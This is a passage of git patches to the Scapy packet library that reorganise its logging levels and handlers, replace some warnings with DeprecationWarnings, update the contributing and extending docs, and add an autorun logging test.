afterwards. You should comply with these guidelines to +make sure logging in Scapy remains helpful. + +- If you want the log message to only be displayed when using Scapy through + the interactive console, use `scapy.error.log_interactive`. You are free to + use any log level. +- Otherwise, always use `scapy.error.log_runtime`. + - On **packet dissection**, of *packet layers* + you should remain **AT OR BELOW the `logging.INFO` level**, unless the + issue is critical or tied to security. + For instance: "DNS Decompression loop detected !" is allowed as WARNING, + but "Could not dissect packet" or "Invalid value detected" are not. + - On **packet build** or **any command** or function that is called by the + user or the root program, you are **free and welcomed** to use the WARNING + or ERROR levels, to signal that a packet was wrongly built for instance. +- If you are working on Scapy's core, you may use: `scapy.error.log_loading` + only while Scapy is loading, to display import errors for instance. + + ### Python 2 and 3 compatibility The project aims to provide code that works both on Python 2 and Python 3. Therefore, some rules need to be applied to achieve compatibility: diff --git a/doc/scapy/extending.rst b/doc/scapy/extending.rst index 41ccb9654e8..abb1f655081 100644 --- a/doc/scapy/extending.rst +++ b/doc/scapy/extending.rst @@ -22,6 +22,25 @@ This first example takes an IP or a name as first parameter, send an ICMP echo r if p: p.show() +Configuring Scapy's logger +-------------------------- + +Scapy configures a logger automatically using Python's ``logging`` module. This +logger is custom to support things like colors and frequency filters. By +default, it is set to ``WARNING`` (when not in interactive mode), but you can +change that using for instance:: + + import logging + logging.getLogger("scapy").setLevel(logging.CRITICAL) + +To disable almost all logs. (Scapy simply won't work properly if a CRITICAL +failure occurs) + +.. note:: On interactive mode, the default log level is ``INFO`` + +More examples +------------- + This is a more complex example which does an ARP ping and reports what it found with LaTeX formatting:: #! /usr/bin/env python @@ -73,7 +92,6 @@ Once you've done that, you can launch Scapy and import your file, but this is st import logging logger = logging.getLogger("scapy") logger.setLevel(logging.INFO) - logger.addHandler(logging.StreamHandler()) from scapy.all import * diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 649f91769dc..9c00ef4fee7 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -13,9 +13,12 @@ from __future__ import absolute_import from __future__ import print_function -from scapy.sendrecv import send, sniff + +import warnings + from scapy.config import conf -from scapy.error import log_interactive +from scapy.sendrecv import send, sniff + import scapy.modules.six as six @@ -113,7 +116,10 @@ def reply(self, pkt): self.print_reply(pkt, reply) def run(self, *args, **kargs): - log_interactive.warning("run() method deprecated. The instance is now callable") # noqa: E501 + warnings.warn( + "run() method deprecated. The instance is now callable", + DeprecationWarning + ) self(*args, **kargs) def __call__(self, *args, **kargs): diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 8030309eede..807cfbde300 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -19,7 +19,12 @@ from scapy.config import conf from scapy.consts import WINDOWS from scapy.data import MTU, ETH_P_ALL -from scapy.error import Scapy_Exception, log_loading, warning +from scapy.error import ( + Scapy_Exception, + log_loading, + log_runtime, + warning, +) from scapy.interfaces import network_name, InterfaceProvider, NetworkInterface from scapy.pton_ntop import inet_ntop from scapy.supersocket import SuperSocket @@ -244,7 +249,7 @@ def __init__(self, device, snaplen, promisc, to_ms, monitor=None): pcap_set_promisc(self.pcap, promisc) pcap_set_timeout(self.pcap, to_ms) if pcap_set_rfmon(self.pcap, 1) != 0: - warning("Could not set monitor mode") + log_runtime.error("Could not set monitor mode") if pcap_activate(self.pcap) != 0: raise OSError("Could not activate the pcap handler") else: @@ -289,7 +294,7 @@ def datalink(self): def fileno(self): if WINDOWS: - log_loading.error("Cannot get selectable PCAP fd on Windows") + log_runtime.error("Cannot get selectable PCAP fd on Windows") return -1 else: # This does not exist under Windows @@ -298,11 +303,11 @@ def fileno(self): def setfilter(self, f): filter_exp = create_string_buffer(f.encode("utf8")) if pcap_compile(self.pcap, byref(self.bpf_program), filter_exp, 0, -1) == -1: # noqa: E501 - log_loading.error("Could not compile filter expression %s", f) + log_runtime.error("Could not compile filter expression %s", f) return False else: if pcap_setfilter(self.pcap, byref(self.bpf_program)) == -1: - log_loading.error("Could not install filter %s", f) + log_runtime.error("Could not set filter %s", f) return False return True diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 53744cdc3c2..0b12c209279 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -24,17 +24,23 @@ from scapy.consts import LINUX import scapy.utils import scapy.utils6 -from scapy.packet import Packet, Padding +from scapy.arch.common import get_if, compile_filter, _iff_flags from scapy.config import conf from scapy.data import MTU, ETH_P_ALL, SOL_PACKET, SO_ATTACH_FILTER, \ SO_TIMESTAMPNS +from scapy.error import ( + ScapyInvalidPlatformException, + Scapy_Exception, + log_loading, + log_runtime, + warning, +) from scapy.interfaces import IFACES, InterfaceProvider, NetworkInterface, \ network_name -from scapy.supersocket import SuperSocket +from scapy.packet import Packet, Padding from scapy.pton_ntop import inet_ntop -from scapy.error import warning, Scapy_Exception, \ - ScapyInvalidPlatformException, log_runtime -from scapy.arch.common import get_if, compile_filter, _iff_flags +from scapy.supersocket import SuperSocket + import scapy.modules.six as six from scapy.modules.six.moves import range @@ -116,7 +122,7 @@ def _get_if_list(): f.close() except Exception: pass - warning("Can't open /proc/net/dev !") + log_loading.critical("Can't open /proc/net/dev !") return [] lst = [] f.readline() @@ -204,7 +210,7 @@ def read_routes(): try: f = open("/proc/net/route", "rb") except IOError: - warning("Can't open /proc/net/route !") + log_loading.critical("Can't open /proc/net/route !") return [] routes = [] s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -436,7 +442,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, try: attach_filter(self.ins, filter, iface) except ImportError as ex: - warning("Cannot set filter: %s" % ex) + log_runtime.error("Cannot set filter: %s" % ex) if self.promisc: set_promisc(self.ins, self.iface) self.ins.bind((self.iface, type)) diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index 139491266ab..3d289c02395 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -15,7 +15,7 @@ from scapy.arch import get_if_addr from scapy.config import conf from scapy.consts import FREEBSD, NETBSD, OPENBSD, SOLARIS -from scapy.error import warning, log_interactive +from scapy.error import log_runtime, warning from scapy.pton_ntop import inet_pton from scapy.utils6 import in6_getscope, construct_source_candidate_set from scapy.utils6 import in6_isvalid, in6_ismlladdr, in6_ismnladdr @@ -119,7 +119,10 @@ def read_routes(): ifaddr = get_if_addr(guessed_netif) routes.append((dest, netmask, gw, guessed_netif, ifaddr, metric)) # noqa: E501 else: - warning("Could not guess partial interface name: %s", netif) # noqa: E501 + log_runtime.info( + "Could not guess partial interface name: %s", + netif + ) else: raise else: @@ -161,7 +164,7 @@ def _in6_getifaddr(ifname): try: f = os.popen("%s %s" % (conf.prog.ifconfig, ifname)) except OSError: - log_interactive.warning("Failed to execute ifconfig.") + log_runtime.warning("Failed to execute ifconfig.") return [] # Iterate over lines and extract IPv6 addresses @@ -207,7 +210,7 @@ def in6_getifaddr(): try: f = os.popen(cmd % conf.prog.ifconfig) except OSError: - log_interactive.warning("Failed to execute ifconfig.") + log_runtime.warning("Failed to execute ifconfig.") return [] # Get the list of network interfaces @@ -221,7 +224,7 @@ def in6_getifaddr(): try: f = os.popen("%s -l" % conf.prog.ifconfig) except OSError: - log_interactive.warning("Failed to execute ifconfig.") + log_runtime.warning("Failed to execute ifconfig.") return [] # Get the list of network interfaces diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index f9f73c1e3b4..7c3399dd01b 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -23,7 +23,13 @@ get_service_status from scapy.consts import WINDOWS, WINDOWS_XP from scapy.config import conf, ConfClass -from scapy.error import Scapy_Exception, log_loading, log_runtime, warning +from scapy.error import ( + Scapy_Exception, + log_interactive, + log_loading, + log_runtime, + warning, +) from scapy.interfaces import NetworkInterface, InterfaceProvider, \ dev_from_index, resolve_iface, network_name from scapy.pton_ntop import inet_ntop, inet_pton @@ -219,7 +225,10 @@ def test_windump_npcap(): return False windump_ok = test_windump_npcap() if not windump_ok: - warning("The installed Windump version does not work with Npcap ! Refer to 'Winpcap/Npcap conflicts' in scapy's doc") # noqa: E501 + log_loading.warning( + "The installed Windump version does not work with Npcap! " + "Refer to 'Winpcap/Npcap conflicts' in scapy's installation doc" + ) del windump_ok @@ -535,7 +544,7 @@ def _ask_user(): # No action needed return else: - warning( + log_interactive.warning( "Scapy has detected that your pcap service is not running !" ) if not conf.interactive or _ask_user(): @@ -543,11 +552,12 @@ def _ask_user(): if succeed: log_loading.info("Pcap service started !") return - warning("Could not start the pcap service ! " - "You probably won't be able to send packets. " - "Deactivating unneeded interfaces and restarting " - "Scapy might help. Check your winpcap/npcap installation " - "and access rights.") + log_loading.warning( + "Could not start the pcap service! " + "You probably won't be able to send packets. " + "Check your winpcap/npcap installation " + "and access rights." + ) def load(self, NetworkInterface_Win=NetworkInterface_Win): results = {} @@ -681,7 +691,7 @@ def open_pcap(iface, *args, **kargs): iface_network_name = iface.network_name if not iface: raise Scapy_Exception( - "Interface is invalid (no pcap match found) !" + "Interface is invalid (no pcap match found)!" ) # Only check monitor mode when manually specified. # Checking/setting for monitor mode will slow down the process, and the @@ -784,10 +794,7 @@ def read_routes(): else: routes = _read_routes_c(ipv6=False) except Exception as e: - warning("Error building scapy IPv4 routing table : %s", e) - else: - if not routes: - warning("No default IPv4 routes found. Your Windows release may no be supported and you have to enter your routes manually") # noqa: E501 + log_loading.warning("Error building scapy IPv4 routing table : %s", e) return routes @@ -835,14 +842,14 @@ def read_routes6(): try: routes6 = _read_routes_c(ipv6=True) except Exception as e: - warning("Error building scapy IPv6 routing table : %s", e) + log_loading.warning("Error building scapy IPv6 routing table : %s", e) return routes6 def _route_add_loopback(routes=None, ipv6=False, iflist=None): """Add a route to 127.0.0.1 and ::1 to simplify unit tests on Windows""" if not WINDOWS: - warning("Not available") + warning("Calling _route_add_loopback is only valid on Windows") return warning("This will completely mess up the routes. Testing purpose only !") # Add only if some adpaters already exist diff --git a/scapy/automaton.py b/scapy/automaton.py index 91ebed52771..f48863a4aaa 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -8,16 +8,18 @@ Automata with states, transitions and actions. """ -from __future__ import absolute_import -import types import itertools -import time +import logging import os import sys +import threading +import time import traceback +import types + from select import select from collections import deque -import threading + from scapy.config import conf from scapy.utils import do_graph from scapy.error import log_runtime, warning @@ -590,6 +592,8 @@ def graph(self, **kargs): class Automaton(six.with_metaclass(Automaton_metaclass)): def parse_args(self, debug=0, store=1, **kargs): self.debug_level = debug + if debug: + conf.logLevel = logging.DEBUG self.socket_kargs = kargs self.store_packets = store diff --git a/scapy/config.py b/scapy/config.py index 9afeddf5e71..ccd579bc2a5 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -9,13 +9,14 @@ from __future__ import absolute_import from __future__ import print_function +import atexit import functools import os import re -import time import socket import sys -import atexit +import time +import warnings from scapy import VERSION, base_classes from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS @@ -713,7 +714,10 @@ def __getattr__(self, attr): from scapy.data import TCP_SERVICES return TCP_SERVICES if attr == "iface6": - warning("conf.iface6 is deprecated in favor of conf.iface") + warnings.warn( + "conf.iface6 is deprecated in favor of conf.iface", + DeprecationWarning + ) attr = "iface" return object.__getattribute__(self, attr) diff --git a/scapy/consts.py b/scapy/consts.py index 9b046e4d27a..ebb1e160eaf 100644 --- a/scapy/consts.py +++ b/scapy/consts.py @@ -3,6 +3,10 @@ # Copyright (C) Philippe Biondi # This program is published under a GPLv2 license +""" +This file contains constants +""" + from sys import platform, maxsize import platform as platform_lib diff --git a/scapy/error.py b/scapy/error.py index 636008219b3..43412947dcd 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -16,6 +16,8 @@ import traceback import time +from scapy.consts import WINDOWS + class Scapy_Exception(Exception): pass @@ -36,6 +38,9 @@ def __init__(self): def filter(self, record): from scapy.config import conf + # Levels below INFO are not covered + if record.levelno <= logging.INFO: + return True wt = conf.warning_threshold if wt > 0: stk = traceback.extract_stack() @@ -55,12 +60,11 @@ def filter(self, record): if nb == 2: record.msg = "more " + record.msg else: - return 0 + return False self.warning_table[caller] = (tm, nb) - return 1 + return True -# Inspired from python-colorbg (MIT) class ScapyColoredFormatter(logging.Formatter): """A subclass of logging.Formatter that handles colors.""" levels_colored = { @@ -81,9 +85,29 @@ def format(self, record): return message +if WINDOWS: + # colorama is bundled within IPython, but + # logging.StreamHandler will be overwritten when called, + # so we can't wait for IPython to call it + try: + import colorama + colorama.init() + except ImportError: + pass + +# get Scapy's master logger log_scapy = logging.getLogger("scapy") -log_scapy.setLevel(logging.WARNING) -log_scapy.addHandler(logging.NullHandler()) +# override the level if not already set +if log_scapy.level == logging.NOTSET: + log_scapy.setLevel(logging.WARNING) +# add a custom handler controlled by Scapy's config +_handler = logging.StreamHandler() +_handler.setFormatter( + ScapyColoredFormatter( + "%(levelname)s: %(message)s", + ) +) +log_scapy.addHandler(_handler) # logs at runtime log_runtime = logging.getLogger("scapy.runtime") log_runtime.addFilter(ScapyFreqFilter()) diff --git a/scapy/fields.py b/scapy/fields.py index db85b695ee0..a7ce25d939f 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -17,10 +17,11 @@ import socket import struct import time +import warnings + from types import MethodType from uuid import UUID - from scapy.config import conf from scapy.dadict import DADict from scapy.volatile import RandBin, RandByte, RandEnumKeys, RandInt, \ @@ -2111,7 +2112,10 @@ def __nonzero__(self): __bool__ = __nonzero__ def flagrepr(self): - warning("obj.flagrepr() is obsolete. Use str(obj) instead.") + warnings.warn( + "obj.flagrepr() is obsolete. Use str(obj) instead.", + DeprecationWarning + ) return str(self) def __str__(self): diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index fd8bd4e7e5a..dbd08316b40 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -10,6 +10,7 @@ from __future__ import absolute_import import struct import time +import warnings from scapy.config import conf from scapy.packet import Packet, bind_layers, NoPayload @@ -22,7 +23,7 @@ from scapy.sendrecv import sr1 from scapy.layers.inet import IP, DestIPField, IPField, UDP, TCP from scapy.layers.inet6 import DestIP6Field, IP6Field -from scapy.error import warning, Scapy_Exception +from scapy.error import log_runtime, warning, Scapy_Exception import scapy.modules.six as six from scapy.modules.six.moves import range @@ -55,8 +56,12 @@ def dns_get_str(s, pointer=0, pkt=None, _fullpacket=False): bytes_left = None while True: if abs(pointer) >= max_length: - warning("DNS RR prematured end (ofs=%i, len=%i)" % (pointer, - len(s))) + log_runtime.info( + "DNS RR prematured end (ofs=%i, len=%i)" % ( + pointer, + len(s) + ) + ) break cur = orb(s[pointer]) # get pointer value pointer += 1 # make pointer go forward @@ -66,7 +71,9 @@ def dns_get_str(s, pointer=0, pkt=None, _fullpacket=False): # as pointer will follow the jump token after_pointer = pointer + 1 if pointer >= max_length: - warning("DNS incomplete jump token at (ofs=%i)" % pointer) + log_runtime.info( + "DNS incomplete jump token at (ofs=%i)" % pointer + ) break # Follow the pointer pointer = ((cur & ~0xc0) << 8) + orb(s[pointer]) - 12 @@ -127,7 +134,10 @@ def dns_encode(x, check_built=False): def DNSgetstr(*args, **kwargs): """Legacy function. Deprecated""" - warning("DNSgetstr deprecated. Use dns_get_str instead") + warnings.warn( + "DNSgetstr is deprecated. Use dns_get_str instead.", + DeprecationWarning + ) return dns_get_str(*args, **kwargs) @@ -313,7 +323,7 @@ def getfield(self, pkt, s): ret = None c = getattr(pkt, self.countfld) if c > len(s): - warning("wrong value: DNS.%s=%i", self.countfld, c) + log_runtime.info("DNS wrong value: DNS.%s=%i", self.countfld, c) return s, b"" while c: c -= 1 @@ -353,7 +363,10 @@ def m2i(self, pkt, s): while tmp_s: tmp_len = orb(tmp_s[0]) + 1 if tmp_len > len(tmp_s): - warning("DNS RR TXT prematured end of character-string (size=%i, remaining bytes=%i)" % (tmp_len, len(tmp_s))) # noqa: E501 + log_runtime.info( + "DNS RR TXT prematured end of character-string " + "(size=%i, remaining bytes=%i)" % (tmp_len, len(tmp_s)) + ) ret_s.append(tmp_s[1:tmp_len]) tmp_s = tmp_s[tmp_len:] return ret_s @@ -448,13 +461,13 @@ def pre_dissect(self, s): dns_len = struct.unpack("!H", s[:2])[0] else: message = "Malformed DNS message: too small!" - warning(message) + log_runtime.info(message) raise Scapy_Exception(message) # Check if the length is valid if dns_len < 14 or len(s) < dns_len: message = "Malformed DNS message: invalid length!" - warning(message) + log_runtime.info(message) raise Scapy_Exception(message) return s @@ -545,7 +558,7 @@ def bitmap2RRlist(bitmap): while bitmap: if len(bitmap) < 2: - warning("bitmap too short (%i)" % len(bitmap)) + log_runtime.info("bitmap too short (%i)" % len(bitmap)) return window_block = orb(bitmap[0]) # window number @@ -553,7 +566,7 @@ def bitmap2RRlist(bitmap): bitmap_len = orb(bitmap[1]) # length of the bitmap in bytes if bitmap_len <= 0 or bitmap_len > 32: - warning("bitmap length is no valid (%i)" % bitmap_len) + log_runtime.info("bitmap length is no valid (%i)" % bitmap_len) return tmp_bitmap = bitmap[2:2 + bitmap_len] diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 20f2299dd6b..cfa1055a248 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -38,7 +38,7 @@ from scapy.sendrecv import sr, sr1 from scapy.plist import PacketList, SndRcvList from scapy.automaton import Automaton, ATMT -from scapy.error import warning +from scapy.error import log_runtime, warning from scapy.pton_ntop import inet_pton import scapy.as_resolvers @@ -346,7 +346,9 @@ class TCPOptionsField(StrField): def getfield(self, pkt, s): opsz = (pkt.dataofs - 5) * 4 if opsz < 0: - warning("bad dataofs (%i). Assuming dataofs=5" % pkt.dataofs) + log_runtime.info( + "bad dataofs (%i). Assuming dataofs=5" % pkt.dataofs + ) opsz = 0 return s[opsz:], self.m2i(pkt, s[:opsz]) @@ -366,7 +368,9 @@ def m2i(self, pkt, x): except IndexError: olen = 0 if olen < 2: - warning("Malformed TCP option (announced length is %i)" % olen) + log_runtime.info( + "Malformed TCP option (announced length is %i)" % olen + ) olen = 2 oval = x[2:olen] if onum in TCPOptions[0]: @@ -411,7 +415,7 @@ def i2m(self, pkt, x): oval = (oval,) oval = struct.pack(ofmt, *oval) else: - warning("option [%s] unknown. Skipped.", oname) + warning("Option [%s] unknown. Skipped.", oname) continue else: onum = oname @@ -419,7 +423,7 @@ def i2m(self, pkt, x): warning("Invalid option number [%i]" % onum) continue if not isinstance(oval, (bytes, str)): - warning("option [%i] is not bytes." % onum) + warning("Option [%i] is not bytes." % onum) continue if isinstance(oval, str): oval = bytes_encode(oval) @@ -666,7 +670,9 @@ def post_build(self, p, pay): ck = scapy.layers.inet6.in6_chksum(socket.IPPROTO_TCP, self.underlayer, p) # noqa: E501 p = p[:16] + struct.pack("!H", ck) + p[18:] else: - warning("No IP underlayer to compute checksum. Leaving null.") + log_runtime.info( + "No IP underlayer to compute checksum. Leaving null." + ) return p def hashret(self): @@ -742,7 +748,9 @@ def post_build(self, p, pay): ck = 0xFFFF p = p[:6] + struct.pack("!H", ck) + p[8:] else: - warning("No IP underlayer to compute checksum. Leaving null.") + log_runtime.info( + "No IP underlayer to compute checksum. Leaving null." + ) return p def extract_padding(self, s): @@ -1408,30 +1416,41 @@ def world_trace(self): import geoip2.database import geoip2.errors except ImportError: - warning("Cannot import geoip2. Won't be able to plot the world.") + log_runtime.error( + "Cannot import geoip2. Won't be able to plot the world." + ) return [] # Check availability of database if not conf.geoip_city: - warning("Cannot import the geolite2 CITY database.\n" - "Download it from http://dev.maxmind.com/geoip/geoip2/geolite2/" # noqa: E501 - " then set its path to conf.geoip_city") + log_runtime.error( + "Cannot import the geolite2 CITY database.\n" + "Download it from http://dev.maxmind.com/geoip/geoip2/geolite2/" # noqa: E501 + " then set its path to conf.geoip_city" + ) return [] # Check availability of plotting devices try: import cartopy.crs as ccrs except ImportError: - warning("Cannot import cartopy.\n" - "More infos on http://scitools.org.uk/cartopy/docs/latest/installing.html") # noqa: E501 + log_runtime.error( + "Cannot import cartopy.\n" + "More infos on http://scitools.org.uk/cartopy/docs/latest/installing.html" # noqa: E501 + ) return [] if not MATPLOTLIB: - warning("Matplotlib is not installed. Won't be able to plot the world.") # noqa: E501 + log_runtime.error( + "Matplotlib is not installed. Won't be able to plot the world." + ) return [] # Open & read the GeoListIP2 database try: db = geoip2.database.Reader(conf.geoip_city) except Exception: - warning("Cannot open geoip2 database at %s", conf.geoip_city) + log_runtime.error( + "Cannot open geoip2 database at %s", + conf.geoip_city + ) return [] # Regroup results per trace diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index b4279b8e8d6..cc68b62e01e 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -39,7 +39,7 @@ from scapy.config import conf from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ MTU -from scapy.error import warning +from scapy.error import log_runtime, warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \ LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \ @@ -317,7 +317,7 @@ def extract_padding(self, data): idx += 1 if jumbo_len is None: - warning("Scapy did not find a Jumbo option") + log_runtime.info("Scapy did not find a Jumbo option") jumbo_len = 0 tmp_len = hbh_len + jumbo_len diff --git a/scapy/main.py b/scapy/main.py index 0cc1b1ef9fe..6b0bd27e8fb 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -25,8 +25,11 @@ # Never add any global import, in main.py, that would trigger a # warning message before the console handlers gets added in interact() -from scapy.error import log_interactive, log_loading, log_scapy, \ - Scapy_Exception, ScapyColoredFormatter +from scapy.error import ( + log_interactive, + log_loading, + Scapy_Exception, +) import scapy.modules.six as six from scapy.themes import DefaultTheme, BlackAndWhite, apply_ipython_style from scapy.consts import WINDOWS @@ -482,34 +485,13 @@ def _len(line): def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): # type: (Optional[Any], Optional[Any], Optional[Any], int) -> None - """Starts Scapy's console.""" - try: - if WINDOWS: - # colorama is bundled within IPython. - # logging.StreamHandler will be overwritten when called, - # We can't wait for IPython to call it - import colorama - colorama.init() - # Success - console_handler = logging.StreamHandler() - console_handler.setFormatter( - ScapyColoredFormatter( - "%(levelname)s: %(message)s", - ) - ) - except ImportError: - # Failure: ignore colors in the logger - console_handler = logging.StreamHandler() - console_handler.setFormatter( - logging.Formatter( - "%(levelname)s: %(message)s", - ) - ) - log_scapy.addHandler(console_handler) - + """ + Starts Scapy's console. + """ # We're in interactive mode, let's throw the DeprecationWarnings warnings.simplefilter("always") + # Set interactive mode, load the color scheme from scapy.config import conf conf.interactive = True conf.color_theme = DefaultTheme() diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 401667b38f0..29a2967423d 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -13,7 +13,7 @@ from scapy.automaton import Message, select_objects, SelectableObject from scapy.consts import WINDOWS -from scapy.error import log_interactive, warning +from scapy.error import log_runtime, warning from scapy.config import conf from scapy.utils import get_temp_file, do_graph @@ -108,7 +108,7 @@ def _add_pipes(self, *pipes): return pl def run(self): - log_interactive.info("Pipe engine thread started.") + log_runtime.debug("Pipe engine thread started.") try: for p in self.active_pipes: p.start() @@ -136,7 +136,7 @@ def run(self): try: fd.deliver() except Exception as e: - log_interactive.exception("piping from %s failed: %s" % (fd.name, e)) # noqa: E501 + log_runtime.exception("piping from %s failed: %s" % (fd.name, e)) # noqa: E501 else: if fd.exhausted(): exhausted.add(fd) @@ -149,7 +149,7 @@ def run(self): p.stop() finally: self.thread_lock.release() - log_interactive.info("Pipe engine thread stopped.") + log_runtime.debug("Pipe engine thread stopped.") def start(self): if self.thread_lock.acquire(0): @@ -158,7 +158,7 @@ def start(self): _t.start() self.thread = _t else: - warning("Pipe engine already running") + log_runtime.debug("Pipe engine already running") def wait_and_stop(self): self.stop(_cmd="B") @@ -174,7 +174,7 @@ def stop(self, _cmd="X"): except Exception: pass else: - warning("Pipe engine thread not running") + log_runtime.debug("Pipe engine thread not running") except KeyboardInterrupt: print("Interrupted by user.") diff --git a/scapy/plist.py b/scapy/plist.py index d50d3f6bd2a..445f4f72864 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -182,10 +182,6 @@ def nsummary(self, prn=None, lfilter=None): else: print(prn(*res)) - def display(self): # Deprecated. Use show() - """deprecated. is show()""" - self.show() - def show(self, *args, **kargs): # type: (Any, Any) -> None """Best way to display the packet list. Defaults to nsummary() method""" # noqa: E501 diff --git a/scapy/route.py b/scapy/route.py index 3e8031f7b8e..4b6b98fff6f 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -82,7 +82,7 @@ def delt(self, *args, **kargs): i = self.routes.index(route) del(self.routes[i]) except ValueError: - warning("no matching route found") + raise ValueError("No matching route found!") def ifchange(self, iff, addr): self.invalidate_cache() diff --git a/scapy/utils.py b/scapy/utils.py index 5b792347ed2..a9bef03fd30 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -24,6 +24,7 @@ import subprocess import tempfile import threading +import warnings import scapy.modules.six as six from scapy.modules.six.moves import range, input, zip_longest @@ -693,7 +694,10 @@ def do_graph(graph, prog=None, format=None, target=None, type=None, if string: return graph if type is not None: - warning("type is deprecated, and was renamed format") + warnings.warn( + "type is deprecated, and was renamed format", + DeprecationWarning + ) format = type if prog is None: prog = conf.prog.dot diff --git a/test/tls/example_client.py b/test/tls/example_client.py index efc18540f5d..fdc93c154ed 100755 --- a/test/tls/example_client.py +++ b/test/tls/example_client.py @@ -8,14 +8,10 @@ Default protocol version is TLS 1.3. """ -import logging import os import socket import sys -logger = logging.getLogger("scapy") -logger.addHandler(logging.StreamHandler()) - basedir = os.path.abspath(os.path.join(os.path.dirname(__file__),"../../")) sys.path=[basedir]+sys.path @@ -85,10 +81,6 @@ except socket.error: server_name = args.server -if args.debug == 5: - conf.logLevel = 10 - conf.warning_threshold = 0 - t = TLSClientAutomaton(server=args.server, dport=args.port, server_name=server_name, client_hello=ch, diff --git a/test/tls/example_server.py b/test/tls/example_server.py index f7b68487f12..b1ec35dfc0d 100755 --- a/test/tls/example_server.py +++ b/test/tls/example_server.py @@ -13,10 +13,6 @@ import os import sys -import logging - -logger = logging.getLogger("scapy") -logger.addHandler(logging.StreamHandler()) basedir = os.path.abspath(os.path.join(os.path.dirname(__file__),"../../")) sys.path=[basedir]+sys.path @@ -51,10 +47,6 @@ else: psk_mode = "psk_dhe_ke" -if args.debug == 5: - conf.logLevel = 10 - conf.warning_threshold = 0 - t = TLSServerAutomaton(mycert=basedir+'/test/tls/pki/srv_cert.pem', mykey=basedir+'/test/tls/pki/srv_key.pem', preferred_ciphersuite=pcs, From 1554361d09b5c74439681c6a64101ca848314599 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 25 Sep 2020 14:18:26 +0000 Subject: [PATCH 0286/1632] Catch logging in autorun --- scapy/autorun.py | 9 ++++++++- test/regression.uts | 6 ++++++ 2 files changed, 14 insertions(+), 1 deletion(-) diff --git a/scapy/autorun.py b/scapy/autorun.py index 06cc8e15ee8..d2db7cc0f5b 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -11,9 +11,11 @@ import code import sys import importlib +import logging + from scapy.config import conf from scapy.themes import NoTheme, DefaultTheme, HTMLTheme2, LatexTheme2 -from scapy.error import Scapy_Exception +from scapy.error import log_scapy, Scapy_Exception from scapy.utils import tex_escape import scapy.modules.six as six @@ -109,6 +111,9 @@ def autorun_get_interactive_session(cmds, **kargs): """ sstdout, sstderr = sys.stdout, sys.stderr sw = StringWriter() + h_old = log_scapy.handlers[0] + log_scapy.removeHandler(h_old) + log_scapy.addHandler(logging.StreamHandler(stream=sw)) try: try: sys.stdout = sys.stderr = sw @@ -118,6 +123,8 @@ def autorun_get_interactive_session(cmds, **kargs): raise finally: sys.stdout, sys.stderr = sstdout, sstderr + log_scapy.removeHandler(log_scapy.handlers[0]) + log_scapy.addHandler(h_old) return sw.s, res diff --git a/test/regression.uts b/test/regression.uts index 1348ab407c1..038a987654e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -784,6 +784,12 @@ assert(ret == ("\\textcolor{blue}{{\\tt\\char62}{\\tt\\char62}{\\tt\\char62} }IP ret = autorun_get_text_interactive_session("scapy_undefined") assert "NameError" in ret[0] += Test autorun with logging + +cmds = """log_runtime.info(hex_bytes("446166742050756e6b"))\n""" +ret = autorun_get_text_interactive_session(cmds) +assert "Daft Punk" in ret[0] + = Test utility TEX functions assert tex_escape("{scapy}\\^$~#_&%|><") == "{\\tt\\char123}scapy{\\tt\\char125}{\\tt\\char92}\\^{}\\${\\tt\\char126}\\#\\_\\&\\%{\\tt\\char124}{\\tt\\char62}{\\tt\\char60}" From f04b0ae1acf0cb72ce71103c52abbbc020405c68 Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 21 May 2020 15:54:08 +0200 Subject: [PATCH 0287/1632] Core typing: compat/config/fields/main/packet --- .config/mypy/mypy.ini | 14 +- .config/mypy/mypy_check.py | 21 +- .config/mypy/mypy_enabled.txt | 7 +- scapy/__init__.py | 6 +- scapy/base_classes.py | 10 + scapy/compat.py | 175 ++- scapy/config.py | 216 ++- scapy/contrib/automotive/bmw/definitions.py | 2 +- scapy/contrib/automotive/someip.py | 4 +- scapy/contrib/eigrp.py | 28 +- scapy/contrib/nfs.py | 4 +- scapy/contrib/portmap.py | 2 +- scapy/fields.py | 1327 ++++++++++++++----- scapy/layers/dhcp6.py | 32 +- scapy/layers/dns.py | 17 +- scapy/layers/dot11.py | 1 + scapy/layers/inet.py | 4 +- 